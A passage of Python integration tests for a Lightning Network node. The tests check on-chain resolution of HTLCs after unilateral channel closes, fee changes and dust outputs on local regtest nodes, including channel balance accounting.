assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_timeout(node_factory, bitcoind, executor):
"""Onchain handling of outgoing failed htlcs"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 1 fails just after it's irrevocably committed
disconnects = ['+WIRE_REVOKE_AND_ACK*3', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1, l2 = node_factory.line_graph(2,
opts=[{'disconnect': disconnects,
'feerates': (7500, 7500, 7500, 7500),
'plugin': coin_mvt_plugin},
{'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
inv = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')
rhash = inv['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'], groupid=1)
with pytest.raises(RpcError):
l1.rpc.waitsendpay(rhash)
# Make sure CLTVs are different, in case it confuses onchaind.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, [l1])
# Second one will cause drop to chain.
l1.rpc.sendpay([routestep], rhash, payment_secret=inv['payment_secret'], groupid=2)
payfuture = executor.submit(l1.rpc.waitsendpay, rhash)
# l1 will drop to chain.
l1.daemon.wait_for_log('permfail')
l1.wait_for_channel_onchain(l2.info['id'])
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_logs(['Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks',
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX .* after 6 blocks'])
bitcoind.generate_block(4)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
# It should fail.
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE: timed out'):
payfuture.result(TIMEOUT)
# 2 later, l1 spends HTLC (5 blocks total).
bitcoind.generate_block(2)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# 89 later, l2 is done.
bitcoind.generate_block(89)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 100 blocks and l1 should be done.
bitcoind.generate_block(10)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_middleman(node_factory, bitcoind):
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2->3, 1->2 goes down after 2 gets preimage from 3.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
l1, l2, l3 = node_factory.get_nodes(3, opts=[{'plugin': coin_mvt_plugin},
{'plugin': coin_mvt_plugin,
'disconnect': disconnects},
{}])
# l2 connects to both, so l1 can't reconnect and thus l2 drops to chain
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
l2.fundchannel(l1, 10**6)
c23, _ = l2.fundchannel(l3, 10**6)
channel_id = first_channel_id(l1, l2)
# Make sure routes finalized.
bitcoind.generate_block(5)
l1.wait_channel_active(c23)
# Give l1 some money to play with.
l2.pay(l1, 2 * 10**8)
# Must be bigger than dust!
inv = l3.rpc.invoice(10**8, 'middleman', 'desc')
rhash = inv['payment_hash']
route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
assert len(route) == 2
q = queue.Queue()
def try_pay():
try:
l1.rpc.sendpay(route, rhash, payment_secret=inv['payment_secret'])
l1.rpc.waitsendpay(rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l2 will drop to chain.
l2.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1, wait_for_mempool=1)
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('OUR_UNILATERAL/THEIR_HTLC')
# l2 should fulfill HTLC onchain, and spend to-us (any order)
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
# Payment should succeed.
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
# Three more, l2 can spend to-us.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# One more block, HTLC tx is now spendable.
l1.bitcoin.generate_block(1)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
# 100 blocks after last spend, l2 should be done.
l1.bitcoin.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Verify accounting for l1 & l2
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_middleman_their_unilateral_in(node_factory, bitcoind):
""" This is the same as test_onchain_middleman, except that
node l1 drops to chain, not l2, reversing the unilateral
handling logic """
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
l1_disconnects = ['=WIRE_UPDATE_FULFILL_HTLC', 'permfail']
l2_disconnects = ['-WIRE_UPDATE_FULFILL_HTLC']
l1, l2, l3 = node_factory.get_nodes(3, opts=[{'plugin': coin_mvt_plugin,
'disconnect': l1_disconnects},
{'plugin': coin_mvt_plugin,
'disconnect': l2_disconnects},
{}])
l2.rpc.connect(l1.info['id'], 'localhost', l1.port)
l2.rpc.connect(l3.info['id'], 'localhost', l3.port)
c12, _ = l2.fundchannel(l1, 10**6)
c23, _ = l2.fundchannel(l3, 10**6)
channel_id = first_channel_id(l1, l2)
# Make sure routes finalized.
bitcoind.generate_block(5)
l1.wait_channel_active(c23)
# Make sure l3 sees gossip for channel now; it can get upset
# and give bad gossip msg if channel is closed before it sees
# node announcement.
wait_for(lambda: l3.rpc.listchannels(c12)['channels'] != [])
# Give l1 some money to play with.
l2.pay(l1, 2 * 10**8)
# Must be bigger than dust!
inv = l3.rpc.invoice(10**8, 'middleman', 'desc')
rhash = inv['payment_hash']
route = l1.rpc.getroute(l3.info['id'], 10**8, 1)["route"]
assert len(route) == 2
q = queue.Queue()
def try_pay():
try:
l1.rpc.sendpay(route, rhash, payment_secret=inv['payment_secret'])
l1.rpc.waitsendpay(rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l1 will drop to chain.
l1.daemon.wait_for_log(' to AWAITING_UNILATERAL')
l1.daemon.wait_for_log('sendrawtx exit 0')
l1.bitcoin.generate_block(1)
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('THEIR_UNILATERAL/THEIR_HTLC')
# l2 should fulfill HTLC onchain, immediately
l2.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
'THEIR_UNILATERAL/THEIR_HTLC')
# Payment should succeed.
l1.bitcoin.generate_block(1)
l1.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
l1.bitcoin.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 100 blocks after last spend, l1 should be done.
l1.bitcoin.generate_block(100)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Verify accounting for l1 & l2
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_their_unilateral_out(node_factory, bitcoind):
""" Very similar to the test_onchain_middleman, except there's no
middleman, we simply want to check that our offered htlc
on their unilateral returns to us (and is accounted
for correctly) """
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
l1, l2 = node_factory.line_graph(2, opts=[{'plugin': coin_mvt_plugin},
{'disconnect': disconnects,
'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
route = l1.rpc.getroute(l2.info['id'], 10**8, 1)["route"]
assert len(route) == 1
q = queue.Queue()
def try_pay():
try:
# rhash is fake (so is payment_secret)
rhash = 'B1' * 32
l1.rpc.sendpay(route, rhash, payment_secret=rhash)
q.put(None)
except Exception as err:
q.put(err)
t = threading.Thread(target=try_pay)
t.daemon = True
t.start()
# l2 will drop to chain.
l2.daemon.wait_for_log(' to AWAITING_UNILATERAL')
l2.daemon.wait_for_log('sendrawtx exit 0')
l2.bitcoin.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC')
# l1 should wait til to_self_delay (10), then fulfill onchain
l2.bitcoin.generate_block(9)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
l2.daemon.wait_for_log('Ignoring output .*_UNILATERAL/THEIR_HTLC')
err = q.get(timeout=10)
if err:
print("Got err from sendpay thread")
raise err
t.join(timeout=1)
assert not t.is_alive()
# 100 blocks after last spend, l1+l2 should be done.
l2.bitcoin.generate_block(100)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Verify accounting for l1 & l2
assert account_balance(l2, channel_id) == 0
assert account_balance(l1, channel_id) == 0
def test_listfunds_after_their_unilateral(node_factory, bitcoind):
"""We keep spending info around for their unilateral closes.
Make sure we show the address.
"""
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# FIXME: We can get warnings from unilteral changes, since we treat
# such errors a soft because LND.
l1, l2 = node_factory.line_graph(2, opts=[{'plugin': coin_mvt_plugin,
"allow_warning": True},
{'plugin': coin_mvt_plugin}])
channel_id = first_channel_id(l1, l2)
# listfunds will show 1 output change, and channels.
assert len([o for o in l1.rpc.listfunds()['outputs'] if not o['reserved']]) == 1
l1.stop()
l2.rpc.close(l1.info['id'], unilateraltimeout=1)
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(100)
l1.start()
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
wait_for(lambda: len(l1.rpc.listfunds()['outputs']) == 2)
assert all(['address' in o for o in l1.rpc.listfunds()['outputs']])
# Verify accounting for l1 & l2
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1")
def test_onchain_feechange(node_factory, bitcoind, executor):
"""Onchain handling when we restart with different fees"""
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
l1, l2 = node_factory.line_graph(2, opts=[
{
'may_reconnect': True,
'allow_warning': True,
}, {
'may_reconnect': True,
'disconnect': disconnects,
}
])
inv = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')
rhash = inv['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**8 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash, payment_secret=inv['payment_secret'])
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US .* after 6 blocks')
bitcoind.generate_block(6)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Make sure that gets included.
bitcoind.generate_block(1)
# Now we restart with different feerates.
l1.stop()
l1.daemon.cmd_line.append('--override-fee-rates=20000/9000/2000')
l1.start()
# We recognize different proposal as ours.
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
# We use 3 blocks for "reasonable depth", so add two more
bitcoind.generate_block(2)
# Note that the very similar test_onchain_timeout looks for a
# different string: that's because it sees the JSONRPC response,
# and due to the l1 restart, there is none here.
l1.daemon.wait_for_log('WIRE_PERMANENT_CHANNEL_FAILURE')
# 90 later, l2 is done
bitcoind.generate_block(89)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# Now, 7 blocks and l1 should be done.
bitcoind.generate_block(6)
sync_blockheight(bitcoind, [l1])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
# Payment failed, BTW
assert only_one(l2.rpc.listinvoices('onchain_timeout')['invoices'])['status'] == 'unpaid'
@pytest.mark.developer("needs DEVELOPER=1 for dev-set-fees")
def test_onchain_all_dust(node_factory, bitcoind, executor):
"""Onchain handling when we reduce output to all dust"""
# We track channel balances, to verify that accounting is ok.
coin_mvt_plugin = os.path.join(os.getcwd(), 'tests/plugins/coin_movements.py')
# HTLC 1->2, 2 fails just after they're both irrevocably committed
# We need 2 to drop to chain, because then 1's HTLC timeout tx
# is generated on-the-fly, and is thus feerate sensitive.
disconnects = ['-WIRE_UPDATE_FAIL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None,
'plugin': coin_mvt_plugin},
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects, options={'plugin': coin_mvt_plugin})
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
channel_id = first_channel_id(l1, l2)
inv = l2.rpc.invoice(10**8, 'onchain_timeout', 'desc')
rhash = inv['payment_hash']
# We underpay, so it fails.
routestep = {
'msatoshi': 10**7 - 1,
'id': l2.info['id'],
'delay': 5,
'channel': '1x1x1'
}
executor.submit(l1.rpc.sendpay, [routestep], rhash, payment_secret=inv['payment_secret'])
# l2 will drop to chain.
l2.daemon.wait_for_log('permfail')
l2.wait_for_channel_onchain(l1.info['id'])
# Make l1's fees really high (and wait for it to exceed 50000)
l1.set_feerates((100000, 100000, 100000, 100000))
l1.daemon.wait_for_log('Feerate estimate for unilateral_close set to [56789][0-9]{4}')
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by IGNORING_TINY_PAYMENT .* after 6 blocks')
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('IGNORING_TINY_PAYMENT',
'THEIR_UNILATERAL/OUR_HTLC')
l1.daemon.wait_for_log('Ignoring output .*: THEIR_UNILATERAL/OUR_HTLC')
# 100 deep and l2 forgets.
bitcoind.generate_block(93)
sync_blockheight(bitcoind, [l1, l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# l1 does not wait for ignored payment.
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
assert account_balance(l1, channel_id) == 0
assert account_balance(l2, channel_id) == 0
@pytest.mark.developer("needs DEVELOPER=1 for dev_fail")
def test_onchain_different_fees(node_factory, bitcoind, executor):
"""Onchain handling when we've had a range of fees"""
l1, l2 = node_factory.line_graph(2, fundchannel=True, fundamount=10**7,
opts={'may_reconnect': True})
l2.rpc.dev_ignore_htlcs(id=l1.info['id'], ignore=True)
p1 = executor.submit(l1.pay, l2, 1000000000)
l2.daemon.wait_for_log('htlc 0: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION')
l1.set_feerates((16000, 11000, 7500, 3750))
p2 = executor.submit(l1.pay, l2, 900000000)
l2.daemon.wait_for_log('htlc 1: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION')
# Restart with different feerate for second HTLC.
l1.set_feerates((5000, 5000, 5000, 3750))
l1.restart()
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')
p3 = executor.submit(l1.pay, l2, 800000000)
l2.daemon.wait_for_log('htlc 2: SENT_ADD_ACK_COMMIT->RCVD_ADD_ACK_REVOCATION')
# Drop to chain
l1.rpc.dev_fail(l2.info['id'])
l1.wait_for_channel_onchain(l2.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Both sides should have correct feerate
assert l1.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 11000
}]
assert l2.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 11000
}]
bitcoind.generate_block(5)
# Three HTLCs, and one for the to-us output.
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 4)
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
with pytest.raises(Exception):
p1.result(10)
with pytest.raises(Exception):
p2.result(10)
with pytest.raises(Exception):
p3.result(10)
# Two more for HTLC timeout tx to be spent.
bitcoind.generate_block(2)
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 3)
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@pytest.mark.developer("needs DEVELOPER=1")
def test_permfail_new_commit(node_factory, bitcoind, executor):
# Test case where we have two possible commits: it will use new one.
disconnects = ['-WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None},
feerates=(7500, 7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fundchannel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, new commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# OK, time out HTLC.
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
l2.daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
def setup_multihtlc_test(node_factory, bitcoind):
# l1 -> l2 -> l3 -> l4 -> l5 -> l6 -> l7
# l1 and l7 ignore and HTLCs they're sent.
# For each direction, we create these HTLCs with same payment_hash:
# 1 failed (CLTV1)
# 1 failed (CLTV2)
# 2 live (CLTV2)
# 1 live (CLTV3)
nodes = node_factory.line_graph(7, wait_for_announce=True,
opts={'dev-no-reconnect': None,
'may_reconnect': True})
# Balance by pushing half the funds.
b11 = nodes[-1].rpc.invoice(10**9 // 2, '1', 'balancer')['bolt11']
nodes[0].rpc.pay(b11)
nodes[0].rpc.dev_ignore_htlcs(id=nodes[1].info['id'], ignore=True)
nodes[-1].rpc.dev_ignore_htlcs(id=nodes[-2].info['id'], ignore=True)
preimage = "0" * 64
inv = nodes[0].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)
h = inv['payment_hash']
nodes[-1].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)['payment_hash']
# First, the failed attempts (paying wrong node). CLTV1
r = nodes[0].rpc.getroute(nodes[-2].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[0].rpc.waitsendpay(h)
r = nodes[-1].rpc.getroute(nodes[1].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[-1].rpc.waitsendpay(h)
# Now increment CLTV -> CLTV2
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
# Now, the live attempts with CLTV2 (blackholed by end nodes)
r = nodes[0].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
r = nodes[-1].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
# We send second HTLC from different node, since they refuse to send
# multiple with same hash.
r = nodes[1].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[1].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
r = nodes[-2].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-2].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
# Now increment CLTV -> CLTV3.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
r = nodes[2].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[2].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
r = nodes[-3].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-3].rpc.sendpay(r, h, payment_secret=inv['payment_secret'])
# Make sure HTLCs have reached the end.
nodes[0].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
nodes[-1].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
return h, nodes
@pytest.mark.developer("needs DEVELOPER=1 for dev_ignore_htlcs")
@pytest.mark.slow_test
def test_onchain_multihtlc_our_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode goes onchain with n+1 channel.
nodes[mid].rpc.dev_fail(nodes[mid + 1].info['id'])
nodes[mid].wait_for_channel_onchain(nodes[mid + 1].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
# TODO Remove our reliance on HTLCs failing on startup and the need for
# this plugin
nodes[0].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[-1].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# After at depth 5, midnode will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# The three outgoing HTLCs time out at 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# And three more for us to consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Depth 3 to consider it settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 100 it's all done (we didn't bother waiting for mid+1's
# spends, so that might still be going)
bitcoind.generate_block(97)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@pytest.mark.developer("needs DEVELOPER=1 for dev_ignore_htlcs")
@pytest.mark.slow_test
def test_onchain_multihtlc_their_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
# Now midnode+1 goes onchain with midnode channel.
nodes[mid + 1].rpc.dev_fail(nodes[mid].info['id'])
nodes[mid + 1].wait_for_channel_onchain(nodes[mid].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
# TODO Remove our reliance on HTLCs failing on startup and the need for
# this plugin
nodes[0].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[-1].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
